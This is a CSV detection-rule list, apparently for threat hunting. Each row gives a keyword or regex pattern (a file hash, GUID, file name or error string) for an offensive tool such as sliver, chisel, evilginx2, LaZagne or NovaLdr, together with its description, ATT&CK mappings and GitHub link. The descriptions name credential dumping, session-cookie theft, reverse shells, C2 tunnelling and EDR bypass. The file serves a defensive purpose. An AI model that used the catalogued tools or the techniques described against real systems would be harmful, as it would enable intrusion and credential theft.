"*F90C57DF-CDE4-4CDE-A2B9-9124C307D53A*",".{0,1000}F90C57DF\-CDE4\-4CDE\-A2B9\-9124C307D53A.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023*",".{0,1000}f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb*",".{0,1000}f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc*",".{0,1000}f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a*",".{0,1000}f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*F93C99ED-28C9-48C5-BB90-DD98F18285A6*",".{0,1000}F93C99ED\-28C9\-48C5\-BB90\-DD98F18285A6.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225*",".{0,1000}f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730*",".{0,1000}f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3*",".{0,1000}f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1*",".{0,1000}f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b*",".{0,1000}f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e*",".{0,1000}f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23*",".{0,1000}f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a*",".{0,1000}fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*FA0DAF13-5058-4382-AE07-65E44AFB5592*",".{0,1000}FA0DAF13\-5058\-4382\-AE07\-65E44AFB5592.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08*",".{0,1000}fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb*",".{0,1000}fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21*",".{0,1000}fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255*",".{0,1000}fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913*",".{0,1000}fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831*",".{0,1000}fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9*",".{0,1000}fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Fadi002/unshackle*",".{0,1000}Fadi002\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*Fahrj/reverse-ssh*",".{0,1000}Fahrj\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*fail to retrieve SAM hashs!*",".{0,1000}fail\sto\sretrieve\sSAM\shashs!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Failed in m1n1dumpIT:*",".{0,1000}Failed\sin\sm1n1dumpIT\:.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*Failed to allocate memory for shellcode:*",".{0,1000}Failed\sto\sallocate\smemory\sfor\sshellcode\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to change shellcode memory protection*",".{0,1000}Failed\sto\schange\sshellcode\smemory\sprotection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to find rx section offset*",".{0,1000}Failed\sto\sfind\srx\ssection\soffset.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to hijack thread:*",".{0,1000}Failed\sto\shijack\sthread\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Failed to overwrite the .text section of ntdll.dll*",".{0,1000}Failed\sto\soverwrite\sthe\s\.text\ssection\sof\sntdll\.dll.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*failed to shut down Tor -- possible bug in bine*",".{0,1000}failed\sto\sshut\sdown\sTor\s\-\-\spossible\sbug\sin\sbine.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*Failed to write shellcode to target process*",".{0,1000}Failed\sto\swrite\sshellcode\sto\starget\sprocess.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Fake Computer Objects Honey Pots*",".{0,1000}Fake\sComputer\sObjects\sHoney\sPots.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Fake Service Accounts Honey Tokens*",".{0,1000}Fake\sService\sAccounts\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*fake_ap.py*",".{0,1000}fake_ap\.py.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*fake_common_roots.txt*",".{0,1000}fake_common_roots\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fake_default_wordlist.txt*",".{0,1000}fake_default_wordlist\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fake_evernote_clipper*",".{0,1000}fake_evernote_clipper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*fake_flash_update*",".{0,1000}fake_flash_update.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*fake_hostnames(hostnames_list)*",".{0,1000}fake_hostnames\(hostnames_list\).{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*fake_lastpass/*",".{0,1000}fake_lastpass\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*fake_notification_ff/*",".{0,1000}fake_notification_ff\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*FakeAMSI.c*",".{0,1000}FakeAMSI\.c.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeAMSI.dll*",".{0,1000}FakeAMSI\.dll.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeAMSI.exe*",".{0,1000}FakeAMSI\.exe.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeCmdLine.*",".{0,1000}FakeCmdLine\..{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeCmdLine.exe*",".{0,1000}FakeCmdLine\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Fake-Cmdline.exe*",".{0,1000}Fake\-Cmdline\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 